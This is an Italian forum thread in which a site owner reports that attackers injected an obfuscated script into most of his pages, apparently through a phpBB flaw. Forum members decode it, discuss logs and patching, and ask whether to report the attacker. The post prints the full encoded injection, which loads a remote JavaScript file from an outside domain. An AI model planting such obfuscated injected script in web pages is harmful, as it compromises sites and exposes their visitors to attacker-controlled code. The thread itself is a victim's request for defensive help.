che attacco e'

[palomo2]

ciao a tutti,
(spero sia la sezione appropriata)
Oggi ho subito un attacco al sito... è successo che quasi tutte le pagine html sono state modificate in testa con l'aggiunta di questo script

codice:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*7%3Cof%7Bfxhwnuy*7%3C*75XWH*8I*7%3Cmyyu*8F44gfwfxtx3htr4ytu4ktyt3ox*7%3C*8J*8H4XHWNUY*8J*5I*5F5')</script>

sapete per caso di cosa si tratta e come ci si può proteggere ?

tnx 1k

[br1]

Mi e' ignoto il motivo per il quale lo ritieni un attacco... a me sembra il solito ingenuo tentativo di mascherare del codice... e per la precisione questo:

<SCRIPT LANGUAGE='javascript' SRC='http://barasos.com/top/foto.js'></SCRIPT>


ciao

Ho letto meglio... ma non saprei dirti come ovviare al problema, salvo editarti tutte le pagine ed avvisare il tuo hoster.

Se vuoi posso spostare la discussione su sicurezza...

[palomo2]

Grazie mille br1 per la tua risposta, ho già inviato una richiesta al mio hoster per conoscere i log di quella determinata ora. Cmq il file era nella root del modulo forum del portale che è stato attaccato, quindi presumo che abbiano sfruttato qualche bug della board phpbb... Questa è la terza volta che subiamo attacchi al sito....

Non è che qualche anima pia può per caso riuscire a capire la falla dov'è ? Ho patchato la board un pò di tempo fa e adesso la ripatcherò .... ma è mai possibile che appena trovano un nuovo bug mi attaccano ? Io credo che il problema sia altrove ... Il poveretto è www.dfteam.it

br1, se reputi + opportuno per la risoluzione del mio problema spostarla in sicurezza, si grazie

[NetEscape]

Hai notato nulla di anomalo nei log del tuo firewall? anche se è difficile che un attacco ripetuto venga loggato, è sempre bene cominciare a guardare li. cmq i forum phpbb sono sempre quelli + presi di mira. c'era anche un thread tempo fa che ne parlava ed il problema era simile. passo la palla ad amvinfe ed Habanero: ricordate il thread? ciao

[palomo2]

Ho trovato anche un altro script in php che dpvrebbe andare in giro a scovare i file di conf con le pass e tante altre cose... per fortuna che xoops non usa il classico file config.php e il conf della phpbb è coleegato direttamente alle variabili di conf passate dal portale.

Adesso ho la sua email, il sito da dove fa scaricare il js che ha incluso nelle pagine del mio sito e gli script che ha usato. Ho inviato anche un email al mio hoster per sapere se hanno la possibilità di vedere qualcosa dai log. Secondo voi posso denunciarlo ? Dico, ne varrebbe la pena ?

[NetEscape]

certo che puoi denunciarlo!